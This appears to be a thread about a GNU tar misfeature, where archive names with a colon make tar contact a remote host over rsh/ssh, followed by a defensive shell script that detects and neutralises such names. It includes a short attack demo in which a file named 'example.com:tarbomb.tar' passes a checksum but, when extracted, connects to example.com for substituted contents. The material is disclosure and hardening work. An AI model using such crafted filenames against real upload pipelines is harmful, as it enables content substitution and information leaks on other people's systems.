Curiously GNU tar is immune to CVE-2017-9800 because it DNS resolves when you invoke that other vulnerability nobody fixed yet: tar xf -V:
Colons in the path make tar surprisingly invoke rsh (ssh) transparently to access the tar remotely, violating the POSIX specification.
Upload a tar, the remote site checks it for safety, they untar, it connects back to your site, you replace the contents on the fly. Or just an info leak.
The feature is fine for all I care -- it just needs to be put behind a command line option. Don't surprise.
wget https://example.com/example.com:tarbomb.tar … # So far so good
sha256sum example.com:tarbomb.tar # Oh cool the checksum is right
tar xf example.com:tarbomb.tar # Boom connects to example.com and new contents
This dangerous feature is documented in the info page at https://www.gnu.org/software/tar/manual/html_section/tar_46.html#local-and-remote-archives … which means it's entirely surprising to most people
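The three-step demo above (download, checksum, extract) turns on one parsing rule in GNU tar: an archive name that contains a colon is taken as host:path and handed to the remote-shell code path. The functions below are an added example, not code from the thread or from GNU tar, that reproduce that rule on the client side so a script can refuse or neutralise such names before tar ever sees them. The classification rule is my reading of the _remdev macro in GNU tar's rmt.h (colon present, not the first character, and no slash anywhere before it); --force-local is GNU tar's documented switch for "archive is local even if it has a colon", and the ./ prefix works on that rule because it puts a slash before the colon. The sample names in the test are constructed.

```shell
#!/bin/sh
# Added example (not from the thread or from GNU tar): detect archive names
# that GNU tar, without --force-local, would treat as remote "host:path".

# Return 0 if NAME would be interpreted as host:path by GNU tar, else 1.
# Rule (as read from GNU tar's rmt.h, _remdev macro; assumption, verify on
# your build): there is a colon, it is not the first character, and no
# slash occurs before it.
tar_treats_as_remote() {
    name=$1
    case $name in
        *:*) ;;                 # has a colon: keep checking
        *)   return 1 ;;        # no colon: plain local file
    esac
    before_colon=${name%%:*}    # text before the first colon
    [ -n "$before_colon" ] || return 1   # colon at position 0: local
    case $before_colon in
        */*) return 1 ;;        # slash before the colon: local path
    esac
    return 0
}

# Rewrite NAME so the colon rule cannot fire: "./host:file" has a slash
# before the colon and is therefore a local relative path on every tar.
localize_archive_name() {
    if tar_treats_as_remote "$1"; then
        printf './%s\n' "$1"
    else
        printf '%s\n' "$1"
    fi
}

# Extract ARCHIVE without ever letting tar spawn rsh/ssh. Belt and braces:
# the ./ prefix is portable; --force-local is GNU tar's documented switch.
# Drop --force-local if the tar in PATH is not GNU tar.
safe_tar_extract() {
    archive=$(localize_archive_name "$1")
    shift
    tar --force-local -xf "$archive" "$@"
}

# Usage, on the thread's example file (constructed name):
#   wget https://example.com/example.com:tarbomb.tar
#   if tar_treats_as_remote example.com:tarbomb.tar; then
#       echo "refusing: tar would treat this name as a remote host:path" >&2
#   fi
#   safe_tar_extract example.com:tarbomb.tar   # extracts ./example.com:tarbomb.tar
```

The check is worth running in any upload pipeline that names files after user-supplied strings: the checksum step in the thread passed because sha256sum opens the path normally, and only tar applies the host:path rewrite, so verifying the file tells you nothing about what tar will open.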
Thankfully busybox tar lacks this "feature".
OpenBSD pax/tar also, this is strictly a GNU tar misfeature.